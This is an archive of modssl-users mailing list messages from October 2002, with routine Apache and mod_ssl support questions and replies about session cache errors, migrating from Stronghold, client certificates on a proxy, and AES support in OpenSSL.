Message-ID: 
X-OriginalArrivalTime: 28 Oct 2002 18:26:10.0548 (UTC) FILETIME=[7D3F6B40:01C27EAF]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Edward Wong" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello All,

While trying to run apache in Windows on an Itanium (in compatibility mode 
no less), I ran into the following error:

===============================
SSLSessionCache: Invalid argument: size has to be >= 8192 bytes
===============================

However, the directives in question are:

===============================
SSLSessionCache        shmcb:logs/ssl_scache(512000)
SSLSessionCacheTimeout  300
===============================

Is there something that I'm missing?  Is shm suppored on Itanium?

I get the same results when using any other shared memory scheme (shm, 
shmht).  I've combed the web and mailing lists for details, but have turned 
up very little.  For Unix/Linux, loading MM libraries seems to fix the 
issue.  Is there a similar solution for windows?  Or should I just use dbm 
for the Windows/Itanium case?

Thanks in Advance,

Edward Wong


_________________________________________________________________
Get a speedy connection with MSN Broadband.  Join now! 
http://resourcecenter.msn.com/access/plans/freeactivation.asp

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 19:36:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA11385; Mon, 28 Oct 2002 19:35:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from communicate.01com.com id TAA11381; Mon, 28 Oct 2002 19:34:55 +0100 (MET)
Received: from 01com.com (DEV_STRAKHOV_98 [10.0.0.43]) by communicate.01com.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21)
	id SVJ7WC54; Mon, 28 Oct 2002 13:28:24 -0500
Message-ID: <3DBEC49B.D62A3AC3@01com.com>
Date: Tue, 29 Oct 2002 12:25:47 -0500
From: Sergey Strakhov 
X-Mailer: Mozilla 4.61 [en] (Win98; I)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
CC: Pedro Nascimento 
Subject: Re: Problem in mod_ssl 2.8.10 + Apache 1.3.26/WIn32 ?
References: <3DAC309F.4057B568@01com.com> <20021015152750.GA5469@fermat.math.technion.ac.il>
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sergey Strakhov 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

> On Tue, Oct 15, 2002, Sergey Strakhov wrote about "Problem in mod_ssl 2.8.10 + Apache 1.3.26/WIn32 ?":
> > We are experiencing problems with our Win32 Apache 1.3.26 with mod_ssl
> > 2.8.10 + openssl 0.9.6b running on Windows 2000.
> > It is a sort of DoS attacks that make our web site totally inaccessible.
>
> >From your description it sounds like this is the worm described in:
>
> http://www.cert.org/advisories/CA-2002-27.html
>
> However, to the best of my knowledge, this worm cannot infect your Windows -
> it will only kill your sever.

Not exactly... It looks more like a Cross-Site-Scripting bug...


> > Will an upgrade to Apache 1.3.27 + mod_ssl 2.8.11 + openssl 0.9.6g solve
> > the problem?
>
> Yes, I think it will.

Version 2.8.11 did not help. But 2.8.12 probably should.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 19:48:11 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA11699; Mon, 28 Oct 2002 19:47:49 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA11673; Mon, 28 Oct 2002 19:46:43 +0100 (MET)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9DF1D4CE739; Mon, 28 Oct 2002 19:46:43 +0100 (CET)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D544D28795; Mon, 28 Oct 2002 19:04:53 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ohm.excelsus.com id SAA09785; Mon, 28 Oct 2002 18:40:43 +0100 (MET)
Received: from ohm.excelsus.com (localhost.excelsus.com [127.0.0.1])
	by ohm.excelsus.com (8.12.3/8.12.3) with ESMTP id g9SHeI4q048874
	for ; Mon, 28 Oct 2002 12:40:18 -0500 (EST)
	(envelope-from weldon@excelsus.com)
Received: from localhost (weldon@localhost)
	by ohm.excelsus.com (8.12.3/8.12.3/Submit) with ESMTP id g9SHe7SI048865
	for ; Mon, 28 Oct 2002 12:40:18 -0500 (EST)
X-Authentication-Warning: ohm.excelsus.com: weldon owned process doing -bs
Date: Mon, 28 Oct 2002 12:40:07 -0500 (EST)
From: Weldon Godfrey 
To: modssl-users@modssl.org
Subject: mod_speling with mod_ssl?
Message-ID: <20021028123403.J41361-100000@ohm.excelsus.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Weldon Godfrey 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Has anyone have any success in getting mod_speling to operate with mod_ssl
for version  mod_ssl-2.8.11-1.3.27?

I configured mod_ssl with --enable-module=speling and when I do a -l on
httpd, it shows mod_speling.c is in there but whenever I place
"CheckSpelling On" in a virtual host, apache is giving me an error as if
the module isn't compiled in.

Thanks in advance,

Weldon

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 20:50:07 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA13914; Mon, 28 Oct 2002 20:49:22 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from herring.crytech.com id UAA13910; Mon, 28 Oct 2002 20:49:06 +0100 (MET)
Received: (qmail 19295 invoked from network); 28 Oct 2002 19:48:59 -0000
Received: from unknown (HELO croaker) (216.187.147.1)
  by herring.crytech.com with SMTP; 28 Oct 2002 19:48:59 -0000
Message-ID: <025801c27eba$b340a410$1801a8c0@croaker>
From: "Emily Eileen Witcher" 
To: 
Subject: Stronghold  and Apache/mod_ssl certificate compatibility
Date: Mon, 28 Oct 2002 12:46:25 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emily Eileen Witcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We are planning to replace an outdated copy of Stronghold (Stronghold/2.4.2
Apache/1.3.6 C2NetEU/2410) with Apache 1.3.27/mod_ssl/2.8.12.

I created what appears to be a workable httpd.conf for Apache. Accessing
http: URLS under Apache works fine. But when trying to access an
Apache/modssl https URL I get this repeated in the error_log:

Invalid method in request \x80L\x01\x03
Invalid method in request \x80L\x01\x03

Do I need a different certificate type for Apache/modssl as opposed to
Stronghold? I know earlier versions of Stronghold didn't use the modssl code
but I want to make sure before I spend the $100 to get a replacement cert
(thanks, Verisign!)

Emily Witcher - emily@crytech.com
Developer and System Administrator
Crytech - 406-655-0501/1-888-CRYTECH


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 21:31:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA15574; Mon, 28 Oct 2002 21:30:26 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from bn0.blue.net id VAA15493; Mon, 28 Oct 2002 21:29:24 +0100 (MET)
Received: from blue (darin.bginc.net [66.38.3.13])
	by bn0.blue.net (8.12.3/8.12.3) with SMTP id g9SKTHEH022864
	for ; Mon, 28 Oct 2002 14:29:17 -0600 (CST)
Message-ID: <000401c27ec0$af8eff00$0d032642@net.blue.net>
From: "John Darin Holloway" 
To: 
References: <025801c27eba$b340a410$1801a8c0@croaker>
Subject: Re: Stronghold  and Apache/mod_ssl certificate compatibility
Date: Mon, 28 Oct 2002 15:29:16 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "John Darin Holloway" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

We were able to pull off this switch this summer SH2.4.2 to Apache
1.3.x-Mod-SSL-2.8.x-OpenSSL-0.9.x
using our old certificate/keys

Grab the sources and compile, make sure you are using --with-crt
and --with-key directives correctly though.  It would appear though that you
do not have something configured correctly, the requests are coming in
encrypted, but the server is not decrypting.  You can't transfer your
httpd.conf directly though, copy over your virtual hosts and any special
handlers/rules to a default apache config and see how that works.

John Darin Holloway
Web Developer and System Administrator, Bluegrass Network, LLC
jdholloway@blue.net  ---  http://www.blue.net

----- Original Message -----
From: "Emily Eileen Witcher" 
To: 
Sent: Monday, October 28, 2002 02:46 PM
Subject: Stronghold and Apache/mod_ssl certificate compatibility


> We are planning to replace an outdated copy of Stronghold
(Stronghold/2.4.2
> Apache/1.3.6 C2NetEU/2410) with Apache 1.3.27/mod_ssl/2.8.12.
>
> I created what appears to be a workable httpd.conf for Apache. Accessing
> http: URLS under Apache works fine. But when trying to access an
> Apache/modssl https URL I get this repeated in the error_log:
>
> Invalid method in request \x80L\x01\x03
> Invalid method in request \x80L\x01\x03
>
> Do I need a different certificate type for Apache/modssl as opposed to
> Stronghold? I know earlier versions of Stronghold didn't use the modssl
code
> but I want to make sure before I spend the $100 to get a replacement cert
> (thanks, Verisign!)
>
> Emily Witcher - emily@crytech.com
> Developer and System Administrator
> Crytech - 406-655-0501/1-888-CRYTECH
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 28 22:43:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA17372; Mon, 28 Oct 2002 22:42:36 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from VL-MS-MR002.sc1.videotron.ca id WAA17339; Mon, 28 Oct 2002 22:40:42 +0100 (MET)
Received: from dopey.geoffnet ([24.202.196.188])
 by VL-MS-MR002.sc1.videotron.ca
 (iPlanet Messaging Server 5.2 HotFix 0.9 (built Jul 29 2002))
 with ESMTP id <0H4P00507O6NXA@VL-MS-MR002.sc1.videotron.ca> for
 modssl-users@modssl.org; Mon, 28 Oct 2002 16:40:00 -0500 (EST)
Date: Mon, 28 Oct 2002 16:39:58 -0500
From: Geoff Thorpe 
Subject: Re: Stronghold  and Apache/mod_ssl certificate compatibility
In-reply-to: <025801c27eba$b340a410$1801a8c0@croaker>
To: modssl-users@modssl.org
Cc: Emily Eileen Witcher 
Message-id: <200210281639.58784.geoff@geoffthorpe.net>
MIME-version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: 7BIT
User-Agent: KMail/1.4.3
References: <025801c27eba$b340a410$1801a8c0@croaker>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Geoff Thorpe 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

On Monday 28 Oct 2002 2:46 pm, Emily Eileen Witcher wrote:
> We are planning to replace an outdated copy of Stronghold
> (Stronghold/2.4.2 Apache/1.3.6 C2NetEU/2410) with Apache
> 1.3.27/mod_ssl/2.8.12.
>
> I created what appears to be a workable httpd.conf for Apache.
> Accessing http: URLS under Apache works fine. But when trying to access
> an Apache/modssl https URL I get this repeated in the error_log:
>
> Invalid method in request \x80L\x01\x03
> Invalid method in request \x80L\x01\x03

Have you turned SSL *on* for the address/port that you want https to
work on? I think the directive is SSLEngine but can't recall off-hand -
I recommend you start by compiling and installing 1.3.27 into a test
directory with the default configuration files and what-not - verify
that it works as you expect (it will configure to listen HTTP on port
8080 and HTTPS on port 8443). Ie;

  http://localhost:8080/
  https://localhost:8443/

If that works, use it as a reference when setting-up and migrating your
Stronghold stuff. As mentioned, I suspect the particular problem you
were hitting was a failure to turn SSL on in the config file - the
default config file installed by modssl should provide a reference to
compare against.

Cheers,
Geoff

-- 
Geoff Thorpe
geoff@geoffthorpe.net
http://www.geoffthorpe.net/


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 00:13:16 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA20665; Tue, 29 Oct 2002 00:12:34 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sj-msg-core-3.cisco.com id AAA20576; Tue, 29 Oct 2002 00:12:06 +0100 (MET)
Received: from mira-sjc5-1.cisco.com (IDENT:mirapoint@mira-sjc5-1.cisco.com [171.71.163.15])
	by sj-msg-core-3.cisco.com (8.12.2/8.12.2) with ESMTP id g9SNBtxF019230
	for ; Mon, 28 Oct 2002 15:11:55 -0800 (PST)
Received: from cisco.com (sunithak-lnx.cisco.com [128.107.140.122])
	by mira-sjc5-1.cisco.com (Mirapoint Messaging Server MOS 3.1.0.66-GA)
	with ESMTP id AAU64744;
	Mon, 28 Oct 2002 15:06:59 -0800 (PST)
Message-ID: <3DBDC43E.629A93D5@cisco.com>
Date: Mon, 28 Oct 2002 15:11:58 -0800
From: Sunitha Kumar 
Organization: Cisco Systems
X-Mailer: Mozilla 4.77 [en] (X11; U; Linux 2.4.2-7 i686)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: openssl and AES
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sunitha Kumar 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,
Anyone know if openssl supports AES, essentially, does it support RFC
3268,
which is "AES ciphersuites for TLS",

thanks,

sunitha



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 00:19:28 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id AAA21139; Tue, 29 Oct 2002 00:18:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from herring.crytech.com id AAA21135; Tue, 29 Oct 2002 00:17:46 +0100 (MET)
Received: (qmail 16271 invoked from network); 28 Oct 2002 23:17:43 -0000
Received: from unknown (HELO croaker) (216.187.147.1)
  by herring.crytech.com with SMTP; 28 Oct 2002 23:17:43 -0000
Message-ID: <032501c27ed7$dbc5d8c0$1801a8c0@croaker>
From: "Emily Eileen Witcher" 
To: 
References: <025801c27eba$b340a410$1801a8c0@croaker> <200210281639.58784.geoff@geoffthorpe.net>
Subject: Re: Stronghold  and Apache/mod_ssl certificate compatibility
Date: Mon, 28 Oct 2002 16:15:08 -0700
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Emily Eileen Witcher" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Thanks - It was a missing "SSLEngine On" directive. I had been using the
default Apache configuration file but copied over the virtual hosts
verbatim, and Stronghold used "SSLFlag On" instead. Problem solved!

Emily Witcher - emily@crytech.com
Developer and System Administrator
Crytech - 406-655-0501/1-888-CRYTECH
----- Original Message -----
From: "Geoff Thorpe" 
To: 
Cc: "Emily Eileen Witcher" 
Sent: Monday, October 28, 2002 2:39 PM
Subject: Re: Stronghold and Apache/mod_ssl certificate compatibility


> Hi,
>
> On Monday 28 Oct 2002 2:46 pm, Emily Eileen Witcher wrote:
> > We are planning to replace an outdated copy of Stronghold
> > (Stronghold/2.4.2 Apache/1.3.6 C2NetEU/2410) with Apache
> > 1.3.27/mod_ssl/2.8.12.
> >
> > I created what appears to be a workable httpd.conf for Apache.
> > Accessing http: URLS under Apache works fine. But when trying to access
> > an Apache/modssl https URL I get this repeated in the error_log:
> >
> > Invalid method in request \x80L\x01\x03
> > Invalid method in request \x80L\x01\x03
>
> Have you turned SSL *on* for the address/port that you want https to
> work on? I think the directive is SSLEngine but can't recall off-hand -
> I recommend you start by compiling and installing 1.3.27 into a test
> directory with the default configuration files and what-not - verify
> that it works as you expect (it will configure to listen HTTP on port
> 8080 and HTTPS on port 8443). Ie;
>
>   http://localhost:8080/
>   https://localhost:8443/
>
> If that works, use it as a reference when setting-up and migrating your
> Stronghold stuff. As mentioned, I suspect the particular problem you
> were hitting was a failure to turn SSL on in the config file - the
> default config file installed by modssl should provide a reference to
> compare against.
>
> Cheers,
> Geoff
>
> --
> Geoff Thorpe
> geoff@geoffthorpe.net
> http://www.geoffthorpe.net/
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
>


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 14:50:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA15935; Tue, 29 Oct 2002 14:49:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.sds.no id OAA15926; Tue, 29 Oct 2002 14:48:25 +0100 (MET)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Tue, 29 Oct 2002 14:48:18 +0100
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: SV: An apache web proxy with client auth?
Date: Tue, 29 Oct 2002 14:48:17 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Ok, have tried to make this work with common sense, but have given up.

Therefore I repeat the question, in hope that it might clarify somewhat:

I have a machine A, which communicates with a machine C via a proxy B
(running apache with mod_ssl). Today, all communication is handled via http.
We must move the communication between B and C to ssl, and C will require
client certificates.

The question now is how can I set up B to send client certificates to C when
it connects     
to it?

The directives I have seen mentioned are:

SSLProxyMachineCertificateFile
SSLProxyVerifyDepth
SSLProxyCACertificateFile
SSLProxyCACertificatePath

...but I have not seen any documentation on any of them, does it exist?

regards
Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 15:29:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA17247; Tue, 29 Oct 2002 15:28:11 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id PAA17242; Tue, 29 Oct 2002 15:28:00 +0100 (MET)
Received: from 202.54.10.78 [202.54.10.78] by sitesontesting.com []
	with DomainPOP (MDaemon.PRO.v5.0.5.R)
	for ; Tue, 29 Oct 2002 19:53:43 +0530
Delivered-To: webmaster@8
Received: (qmail 12458 invoked from network); 29 Oct 2002 13:56:21 -0000
Received: from mmx.engelschall.com (195.27.130.252)
  by 202.54.10.78 with SMTP; 29 Oct 2002 13:56:21 -0000
Received: by mmx.engelschall.com (Postfix)
	id BB6AA193D8; Tue, 29 Oct 2002 14:50:11 +0100 (CET)
Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153])
	by mmx.engelschall.com (Postfix) with ESMTP id 6988B19335
	for ; Tue, 29 Oct 2002 14:50:11 +0100 (CET)
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id OAA15935; Tue, 29 Oct 2002 14:49:16 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from exchange.sds.no id OAA15926; Tue, 29 Oct 2002 14:48:25 +0100 (MET)
Received: by exchange.sds.no with Internet Mail Service (5.5.2654.42)
	id ; Tue, 29 Oct 2002 14:48:18 +0100
Message-ID: 
From: Torvald Baade Bringsvor 
To: "'modssl-users@modssl.org'" 
Subject: SV: An apache web proxy with client auth?
Date: Tue, 29 Oct 2002 14:48:17 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2654.42)
Content-Type: text/plain;
	charset="iso-8859-1"
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users
X-MDRemoteIP: 202.54.10.78
X-MDRcpt-To: modssl-users@modssl.org
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Torvald Baade Bringsvor 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Ok, have tried to make this work with common sense, but have given up.

Therefore I repeat the question, in hope that it might clarify somewhat:

I have a machine A, which communicates with a machine C via a proxy B
(running apache with mod_ssl). Today, all communication is handled via http.
We must move the communication between B and C to ssl, and C will require
client certificates.

The question now is how can I set up B to send client certificates to C when
it connects     
to it?

The directives I have seen mentioned are:

SSLProxyMachineCertificateFile
SSLProxyVerifyDepth
SSLProxyCACertificateFile
SSLProxyCACertificatePath

...but I have not seen any documentation on any of them, does it exist?

regards
Torvald
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 16:01:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA18083; Tue, 29 Oct 2002 16:00:30 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from web12706.mail.yahoo.com id PAA17944; Tue, 29 Oct 2002 15:59:44 +0100 (MET)
Message-ID: <20021029145939.36789.qmail@web12706.mail.yahoo.com>
Received: from [203.200.195.2] by web12706.mail.yahoo.com via HTTP; Tue, 29 Oct 2002 06:59:39 PST
Date: Tue, 29 Oct 2002 06:59:39 -0800 (PST)
From: Anbuchezhian Chelliah 
Subject: Re: openssl and AES
To: modssl-users@modssl.org
Cc: sunithak@cisco.com
In-Reply-To: <3DBDC43E.629A93D5@cisco.com>
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="0-2078659828-1035903579=:36436"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Anbuchezhian Chelliah 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

--0-2078659828-1035903579=:36436
Content-Type: text/plain; charset=us-ascii


Hi Sunita,

    Checkout the news about what you have asked. I fear what you have asked is yet to be implemented in the next version 0.9.7

Regards,

Anbu

NEWS 
==== 

This file gives a brief overview of the major changes between each OpenSSL 
release. For more details please read the CHANGES file. 

Major changes between OpenSSL 0.9.6 and OpenSSL 0.9.7: 

o New library section OCSP. 
o Complete rewrite of ASN1 code. 
o CRL checking in verify code and openssl utility. 
o Extension copying in 'ca' utility. 
o Flexible display options in 'ca' utility. 
o Provisional support for international characters with UTF8. 
o Support for external crypto devices ('engine') is no longer 
a separate distribution. 
o New elliptic curve library section. 
o New AES (Rijndael) library section. 
o Change DES API to clean up the namespace (some applications link also 
against libdes providing similar functions having the same name). 
Provide macros for backward compatibility (will be removed in the 
future). 
o Unifiy handling of cryptographic algorithms (software and 
engine) to be available via EVP routines for asymmetric and 
symmetric ciphers. 
o NCONF: new configuration handling routines. 
o Change API to use more 'const' modifiers to improve error checking 
and help optimizers. 
o Finally remove references to RSAref. 
o Reworked parts of the BIGNUM code. 
o Support for new engines: Broadcom ubsec, Accelerated Encryption 
Processing, IBM 4758. 
o PRNG: query at more locations for a random device, automatic query for 
EGD style random sources at several locations. 
o SSL/TLS: allow optional cipher choice according to server's preference. 
o SSL/TLS: allow server to explicitly set new session ids. 
o SSL/TLS: support Kerberos cipher suites (RFC2712). 
o SSL/TLS: allow more precise control of renegotiations and sessions. 
o SSL/TLS: add callback to retrieve SSL/TLS messages. 
o SSL/TLS: add draft AES ciphersuites (disabled unless explicitly requested). 


--- Sunitha Kumar  wrote: 
> Hi, 
> Anyone know if openssl supports AES, essentially, 
> does it support RFC 
> 3268, 
> which is "AES ciphersuites for TLS", 
> 
> thanks, 
> 
> sunitha 
> 
> 
> 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) 
> www.modssl.org 
> User Support Mailing List 
> modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 




---------------------------------
Do you Yahoo!?
HotJobs - Search new jobs daily now
--0-2078659828-1035903579=:36436
Content-Type: text/html; charset=us-ascii


Hi Sunita,


    Checkout the news about what you have asked. I fear what you have asked is yet to be implemented in the next version 0.9.7


Regards,


Anbu


NEWS 
==== 

This file gives a brief overview of the major changes between each OpenSSL 
release. For more details please read the CHANGES file. 

Major changes between OpenSSL 0.9.6 and OpenSSL 0.9.7: 

o New library section OCSP. 
o Complete rewrite of ASN1 code. 
o CRL checking in verify code and openssl utility. 
o Extension copying in 'ca' utility. 
o Flexible display options in 'ca' utility. 
o Provisional support for international characters with UTF8. 
o Support for external crypto devices ('engine') is no longer 
a separate distribution. 
o New elliptic curve library section. 
o New AES (Rijndael) library section. 
o Change DES API to clean up the namespace (some applications link also 
against libdes providing similar functions having the same name). 
Provide macros for backward compatibility (will be removed in the 
future). 
o Unifiy handling of cryptographic algorithms (software and 
engine) to be available via EVP routines for asymmetric and 
symmetric ciphers. 
o NCONF: new configuration handling routines. 
o Change API to use more 'const' modifiers to improve error checking 
and help optimizers. 
o Finally remove references to RSAref. 
o Reworked parts of the BIGNUM code. 
o Support for new engines: Broadcom ubsec, Accelerated Encryption 
Processing, IBM 4758. 
o PRNG: query at more locations for a random device, automatic query for 
EGD style random sources at several locations. 
o SSL/TLS: allow optional cipher choice according to server's preference. 
o SSL/TLS: allow server to explicitly set new session ids. 
o SSL/TLS: support Kerberos cipher suites (RFC2712). 
o SSL/TLS: allow more precise control of renegotiations and sessions. 
o SSL/TLS: add callback to retrieve SSL/TLS messages. 
o SSL/TLS: add draft AES ciphersuites (disabled unless explicitly requested). 


--- Sunitha Kumar <sunithak@cisco.com> wrote: 
&g

t; Hi, 
> Anyone know if openssl supports AES, essentially, 
> does it support RFC 
> 3268, 
> which is "AES ciphersuites for TLS", 
> 
> thanks, 
> 
> sunitha 
> 
> 
> 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) 
> www.modssl.org 
> User Support Mailing List 
> modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 

Do you Yahoo!?

HotJobs - Search new jobs daily now
--0-2078659828-1035903579=:36436--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Oct 29 16:05:55 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA18230; Tue, 29 Oct 2002 16:04:34 +0100 (MET)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from sitesontesting.com id QAA18209; Tue, 29 Oct 2002 16:03:40 +0100 (MET)
Received: from 202.54.10.78 [202.54.10.78] by sitesontesting.com []
	with DomainPOP (MDaemon.PRO.v5.0.5.R)
	for ; Tue, 29 Oct 2002 20:33:26 +0530
Delivered-To: webmaster@8
Received: (qmail 2370 invoked from network); 29 Oct 2002 15:07:08 -0000
Received: from mmx.engelschall.com (195.27.130.252)
  by 202.54.10.78 with SMTP; 29 Oct 2002 15:07:08 -0000
Received: by mmx.engelschall.com (Postfix)
	id 16046194C3; Tue, 29 Oct 2002 16:01:08 +0100 (CET)
